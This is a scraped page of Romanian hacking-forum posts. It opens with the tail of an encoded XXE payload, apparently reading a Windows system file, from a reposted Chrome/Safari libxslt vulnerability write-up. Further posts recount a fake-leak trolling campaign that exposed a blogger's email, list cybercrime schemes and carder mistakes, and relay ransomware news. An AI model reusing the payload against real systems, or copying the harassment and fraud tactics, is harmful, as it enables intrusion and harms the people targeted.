jRlR1VsTWpCVFdWTlVSVTBsTWpBbE1qSm1hV3hsT2k4dkwyTTZMM2RwYm1SdmQzTXZjM2x6ZEdWdExtbHVhU1V5TWlVelJTVXlNQ1UxUkNVelJTVXdRU1V6UTNoNFpTVXpSU1V3UVNVeU5uaDRaU1V6UWlVd1FTVXpReVV5Um5oNFpTVXpSU2NwSWk4K0Nqd3ZhSFJ0YkQ0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0IFsgIAogICAgPCFFTlRJVFkgZW50IFNZU1RFTSAiPyIgTkRBVEEgYWFhPiAgIApdPgo8dGVzdDEgbG9jYXRpb249ImVudCIvPg=="></iframe><br/> </body> ZIP archive for testing: libxslt.zip. The Bounty All findings were immediately reported to the vendors. Safari Apple implemented the sandbox patch. Assigned CVE: CVE-2023-40415. Reward: $25,000. 💰 Chrome Google implemented the patch and enforced security for documents loaded by the XSL’s document() function. Assigned CVE: CVE-2023-4357. Reward: $3,000. 💸 Links https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40415 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4357 https://issues.chromium.org/issues/40066577 Feel free to write your thoughts about the article on our X page. Follow @ptswarm so you don’t miss our future research and other publications. Source: https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/
    4 points
  33. Am lucrat doi ani, imediat dupa facultate. Si nicidecum in IT. In rest, am lucrat si lucrez pentru mine si nu sunt corporatist (si nici hacker). Si nici bani nu fac multi, ca tot era vorba de ei. Imi e suficient sa-mi iau o haina, sa imbrac femeia si copilul, sa fumez, sa beau cafea. Nu ploua in casa. Pula mea, nu fac colectie si nu ma ingrop cu ei. Si daca as face bani, nu as sta sa ma laud pe o bucata de forum si sa-mi trag limbi in carici de hacår si de smecher de dupa usa baii, anonim 🤣 Hackingul oricum nu e ce crezi tu prietene Sau ziaristii aia de cacat
    4 points
  34. Inregistrarea streamului este mai jos. O sa explic ce s-a intamplat. Il citesc pe Vali Petcu (zoso.ro) de foarte multi ani de zile si atata timp cat am activat pe RST am avut o relatie (virtuala), buna cu el. Nu s-a schimbat acest lucru nici in ziua de azi, chiar daca nu am mai vorbit cu el de prin 2012. Si pe Cetin Ametcea (arhiblog.ro), il citesc la fel de des. Nu am nici o problema cu vreunul dintre ei si nici nu voi avea vreodata. Spun asta ca sa fie clar pentru toata lumea. Dupa ce am reaparut pe forumul RST in urma cu cateva zile am zis ca de dragul vremurilor trecute sa fac o ghidusie. Sa ii fac pe Vali si pe Cetin sa vorbeasca despre RST si in acelasi timp sa vad cati oameni pot aduce pe forum intr-o perioada scurta de timp. Targetul principal era Vali, pentru ca stiam ca sunt multi care nu il suporta si de-abia asteapta sa il atace public. Planul de bataie: da-le haterilor informatia de care au nevoie ca sa il atace pe Vali Petcu RST Forums trebuie sa fie in centrul scandalului Vali si cu Cetin trebuie sa raspunda la acuzatiile ca bazele lor de date au ajuns pe mainile hackerilor (Cetin a preferat sa il doara la banana dupa ce si-a dat seama ca e trolling) planteaza samanta indoielii in mintea celor care ar putea fi afectati de atac (comentatorii care isi folosesc mailurile personale pentru a comenta pe blogurile lor) Vali trebuie sa vorbeasca pe stream despre patanie pentru a clarifica situatia poate se gasea si un ziarist imbecil care sa scrie despre asta fara sa verifice Am scris rapid postarea cu "leakul" si am adaugat manual cu font rosu si centrat doua texte: - "trebuie sa fii utilizator inregistrat pentru a vedea linkul" - "trebuie sa scrii 'Thank you' in comentarii pentru a vedea linkul" Asa ii fortam pe curiosi sa se inregistreze si sa lase si un mesaj pe forum. Atat pentru a ii trolla si mai mult, dar si pentru a creste topicul in Google, prin faptul ca exista activitate la el. Vali si cu Cetin si-au facut amandoi cont pe RST si au incercat sa descarce arhiva (care nu a existat niciodata). Daca nu ma insala instinctul probabil ca si Vladuz a fost printre primii care a incercat sa descarce arhiva, dar, repet, ma bazez doar pe instinct cand spun asta, pentru ca am vazut un nickname foarte asemanator in comentariile de la acea postare. Moving forward, au aparut imediat idiotii utili care au imprastiat vestea pe Reddit, exact cum ma asteptam, pentru ca se stia ca nu il halesc redditorii. De acolo discutiile s-au mutat la Vali in comentarii, samanta indoielii a aparut in mintea comentatorilor lui Vali si au inceput sa il acuze pe nedrept ca nu si-a dat interesul sa ii avertizeze ca a fost spart blogul, iar din momentul acela Vali a "clacat" oarecum de nervi si a inceput distractia. Sar peste niste pasi intermediari care au aprins si mai tare discutiile din comentariile de la el de pe blog, i-am mai dat o mica panica, cred eu, cand am postat un comentariu cu mailul lui si cu numele lui, apoi am asteptat streamul urmator sa vad daca vorbeste despre intamplare. Streamul il aveti mai jos. Acum pentru Vali, pentru ca stiu ca va citi asta, o sa il lamuresc de unde aveam mailul cu care comenta pe blogul lui. Si cum o imagine face cat 1000 de cuvinte, iata aici sursa: https://ibb.co/HHbPgFK Mailul a aparut intr-un stream de-al lui vechi si am facut screenshot la momentul respectiv, just in case, ca poate va fi candva util. Aia e, defect profesional A fost fun, nu a implicat hacking ci doar metode simple, dar bine targetate, menite sa inflameze spiritele. Eu m-am distrat, Vali s-a enervat, dar sunt sigur ca apreciaza un trolling bun, chiar daca cel trollat nu a fost el in mod direct, ci haterii si comentatorii lui. In mare parte planul meu a fost indeplinit cu succes, cu toate ca regret ca nu am prins nici un ziarist babalau care sa scrie despre asta. Dar pe viitor poate rezolv si cu treaba asta daca o sa mai am timp si chef. Acestea fiind spuse va las sa urmariti bucata de stream in care Vali vorbeste despre RST si... multumesc Vali
    4 points
  35. Ori vorbesc eu chineza ori unii sunt atat de prosti de citesc invers. Pozele sunt de la un setup a unui amic ucrainean. Pozele sunt din apartamentul in care el opereaza ferma de cartele prepay. Daca ai fi observat cartele prepay albastre nici nu exista in Romanica. De ce dracu as fi postat poze de la mine acasa ? Probabil apartamentul e si inchiriat. Stiu doar ca el statea in Romania desi ferma era complet operationala in Ucraina. Eu nu fumez nu stiu ce canepa cu concentratie de thc ridicata incat sa imi incarc buletinul pe forumul roman al bugetarilor obositi. Acum m-am prins de ce tu citesti pe dos. Esti un cocalar manelist infect care nu are ce sa faca decat sa dea shareuri cu manele de 2 bani de acum 20 de ani. Dupa atata timp in capitalism voi nu a-ti invatat regula nr 1 a capitalismului: "scared money don't make no money". Nu are rost sa mai imi pierd timpul pe forumul asta. Se vede clar ca majoritatea dintre voi sunteti niste bosorogi care s-au plictisit de viata din 2010 ani de cat v-ati angajat la stat si la nu stiu ce corporatii. Acum organizati nu stiu ce conferinte si va pupati in cur de cateva ori pe an ca ce mari white hackeri sunteti.
    4 points
  36. Lumea s-a schimbat. Au aparut tot felul de servicii si scheme de facut bani: offshore bulletproof hosting - vps, vds mobile proxy 5g retele de proxy-uri/vpn-uri bulletproof one time sms ransomware malware dnm platforme de spam retele sociale dm-uri/reclame ferme de boti cu ai dumpuri de CC-uri, bank logs, identitati... frauda / scamuri money laundering (cash app, venmo, etc.) 0dayurile nu sunt profitabile ca sunt cumparate de servicii asa ca nu se fac din ele bani. Am un tovaras din ucraina care s-a mutat in romania din cauza razboiului. Tipu are o platforma de sms-uri. Face peste 100 de mii de coco profit pe luna. Stiu un roman in Elvetia de vinde cartele sim cu credit anonime prin posta spre toata europa si face o caruta de bani. Repet, cei care nu se ocupa full time de hackareala si nu invata din mers cum functioneaza sistemul financiar international si nu studiaza tehnicile folosite de fbi/interpol/europol, sau nu studiaza cum se spala banii vor fi prinsi si extradati. In functie de ce magarii au facut... unii primesc 5 ani, altii primesc pe viata. Majoritatea hackerilor romani din anii 2000 s-au ocupat cu cardeala. Te puteau prinde foarte usor pe vremea aia. Sagetile erau filate si cei de la bcco (diicot) vedeau cu cine se intalneste, ascultau telefoanele (ca nu discuta nimeni e2e pe vremea aia ) si era suficient sa te bage la grup organizat. Majoritatea hackarasilor nici nu stiau despre antifilaj/contrafilaj. Sagetile de regula se duceau glont la atm-uri - eventual si cu cate 1-2 telefoane pornite prin buzunare. Dupa ce scoteau banii cash se duceau glont acasa sau la sefu. Oricum dupa filaje faceau si o perchezitie si prindeau sagetile cu cardurile clonate prin buzunar. Ce crezi ca faceau sagetile? Turnau tot in scris. Nici nu mai zic ca multi aveau pisicute, cd-uri si laptopuri necriptate prin casa. Iar aia de vindeau-uri dump-uri erau asa de prosti de foloseau western union si se duceau ei (sau niste sageti) sa scoata banii. Dupa ce scoteau banii de la WU isi cumparau ultimul model de BMW cu bani cash sau mai rau ii depuneau in conturile lor bancare. Baietii prin occident folosesc masti si buletine false daca au nevoie de western union. Prin anii 2000 rasareau punctele WU prin Dragasani, Pitesti, Valcea, Calea Mosilor mai rau ca ciupercile dupa ploaie. Acum nu mai foloseste nici dracu WU. Guess why ? Hackareala in romania a murit din fasa. Mirajul banilor i-a atras pe hackarasii romani, dar erau condamnati din prima zi in care s-au apucat ca nu aveau access la informatie si se copiau unii pe altii. Internetul a fost si proiectat ca sa foarte fie supravegheat. Baietii foloseau messenger-ul pe vremea aia si yahoo avea protocol secret cu NSA-ul din anii 2000 sa furnizeze toate emailurile si conversatiile utilizatorilor. Hackarasii autohtoni isi riscau vietile inainte sa apara criptomonedele, sa foloseasca tor, servicii de proxy-uri platite anonim si s-au apucat toti in grup de cardeala de pe calculatoru propriu din apartamentu parintiilor fara sa stie de compartimentarea identitatii online. Internetul a fost proiectat de americani sa fie impotriva hackerilor. Scolile de formare a hackerilor de la mitica nu i-a invatat mai nimic. S-au dus ca boii si au iesit ca vacile. Cred ca o vina majora o au si institutiile romane. Trebuiau ca institutiile de forta romane sa ofere publicului access la metodele cum sunt identificati si arestati hackerasii autohtoni. Americanii barem publica o parte din documente si pot sa fie frunzarite. La unele cazuri importante poti citii toata transcrierea procesului redactata de grefiera si poti vedea toate dovezile de la tribunal. In anii 2008-2010 institutiile de forta din romania incarcau videoclipuri pe youtube de 20-30 de minute cu descinderile mascatiilor. Acum ei incarca video-uri de 10 secunde din care 8 secunde ne arata masinile mascatiilor cum ies pe poarta institutiilor. Criminalitatea cibernetica o sa existe tot timpul, barem institutiile sa fie transparente si sa invete oile cum sa se protejeze ca sa nu mai fie atatia romani extradati si faca cozi prin puscariile de aici. bafta
    4 points
  37. Long story short: (Breachsense) Meanwhile pe tor-site-ul Ransomhub (neverificat) timerul e resetat la 23h desi in articolul initial era la 3zile Data Breach Report Victim nttdata.ro Threat Actor Ransomhub Date Discovered Jul 02, 2024 Description NTT Data Corporation is a Japanese multinational information technology service and consulting company headquartered in Tokyo. Leak Size 230GB Newsarticle: Japan's NTT Data says Romania unit suffered unauthorised access Japan's NTT Data Group said on Wednesday its Romania unit was hit by an instance of unauthorised access in June. The company is investigating how the access, which occurred on June 14, happened and whether information was leaked, a spokesperson said. NTT Data said the access was detected on an old network that the Romanian unit was no longer using as its main network. It had acquired all of the shares in a Romanian information technology service company in 2013 to make it a subsidiary. Shares of NTT Data fell as much as 6.55% on Wednesday compared with a 1.26% gain in the benchmark Nikkei index. sursa
    4 points
  38. Cred ca este cainele lui @Zatarra .... a facut iar prostii.
    4 points
  39. The U.K. National Crime Agency (NCA) has unmasked the administrator and developer of the LockBit ransomware operation, revealing it to be a 31-year-old Russian national named Dmitry Yuryevich Khoroshev. In addition, Khoroshev has been sanctioned by the U.K. Foreign, Commonwealth and Development Office (FCD), the U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC), and the Australian Department of Foreign Affairs. Europol, in a press statement, said authorities are in possession of over 2,500 decryption keys and are continuing to contact LockBit victims to offer support. Khoroshev, who went by the monikers LockBitSupp and putinkrab, has also become the subject of asset freezes and travel bans, with the U.S. Department of State offering a reward of up to $10 million for information leading to his arrest and/or conviction. Previously, the agency had announced reward offers of up to $15 million seeking information leading to the identity and location of key leaders of the LockBit ransomware variant group as well as information leading to the arrests and/or convictions of the group's members. Concurrently, an indictment unsealed by the Department of Justice (DoJ) has charged Khoroshev on 26 counts, including one count of conspiracy to commit fraud, extortion, and related activity in connection with computers; one count of conspiracy to commit wire fraud; eight counts of intentional damage to a protected computer; eight counts of extortion in relation to confidential information from a protected computer; and eight counts of extortion in relation to damage to a protected computer. In all, the charges carry a maximum penalty of 185 years in prison. Each of the charges further carries a monetary penalty that's the greatest of $250,000, pecuniary gain to the offender, or pecuniary harm to the victim. With the latest indictment, a total of six members affiliated with the LockBit conspiracy have been charged, including Mikhail Vasiliev, Mikhail Matveev, Ruslan Magomedovich Astamirov, Artur Sungatov and Ivan Gennadievich Kondratiev. "Today's announcement puts another huge nail in the LockBit coffin and our investigation into them continues," NCA Director General Graeme Biggar said. "We are also now targeting affiliates who have used LockBit services to inflict devastating ransomware attacks on schools, hospitals and major companies around the world." LockBit, which was one of the most prolific ransomware-as-a-service (RaaS) groups, was dismantled as part of a coordinated operation dubbed Cronos earlier this February. It's estimated to have targeted over 2,500 victims worldwide and received more than $500 million in ransom payments. "LockBit ransomware has been used against Australian, U.K. and U.S. businesses, comprising 18% of total reported Australian ransomware incidents in 2022-23 and 119 reported victims in Australia," Penny Wong, Minister for Foreign Affairs of Australia, said. Under the RaaS business model, LockBit licenses its ransomware software to affiliates in exchange for an 80% cut of the paid ransoms. The e-crime group is also known for its double extortion tactics, where sensitive data is exfiltrated from victim networks before encrypting the computer systems and demanding ransom payments. Khoroshev, who started LockBit around September 2019, is believed to have netted at least $100 million in disbursements as part of the scheme over the past four years. In an interesting twist, the indictment has also accused Khoroshev and his co-conspirators of deploying LockBit against multiple Russian victims, stating the defendant demanded identification documents from the recruited affiliates, and even got in touch with law enforcement after the takedown to offer information regarding the identity of his RaaS competitors. "The true impact of LockBit's criminality was previously unknown, but data obtained from their systems showed that between June 2022 and February 2024, more than 7,000 attacks were built using their services," the NCA said. "The top five countries hit were the U.S., U.K., France, Germany and China." LockBit's attempts to resurface after the law enforcement action have been unsuccessful at best, prompting it to post old and fake victims on its new data leak site. "LockBit have created a new leak site on which they have inflated apparent activity by publishing victims targeted prior to the NCA taking control of its services in February, as well as taking credit for attacks perpetrated using other ransomware strains," the agency noted. "The group has attempted to rebuild over the last two months, however [...] they are currently running at limited capacity and the global threat from LockBit has significantly reduced." The RaaS scheme is estimated to have encompassed 194 affiliates until February 24, out of which 148 built attacks and 119 engaged in ransom negotiations with victims. "Of the 119 who began negotiations, there are 39 who appear not to have ever received a ransom payment," the NCA noted. "Seventy-five did not engage in any negotiation, so also appear not to have received any ransom payments." The number of active LockBit affiliates has since dropped to 69, the NCA said, adding LockBit did not routinely delete stolen data once a ransom was paid and that it uncovered numerous instances where the decryptor provided to victims failed to work as expected. "As a core LockBit group leader and developer of the LockBit ransomware, Khoroshev has performed a variety of operational and administrative roles for the cybercrime group, and has benefited financially from the LockBit ransomware attacks," the U.S. Treasury Department said. "Khoroshev has facilitated the upgrading of the LockBit infrastructure, recruited new developers for the ransomware, and managed LockBit affiliates. He is also responsible for LockBit's efforts to continue operations after their disruption by the U.S. and its allies earlier this year." (The story was updated after publication to include additional information related to Khoroshev's indictment.) Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2024/05/russian-hacker-dmitry-khoroshev.html
    4 points
×
×
  • Create New...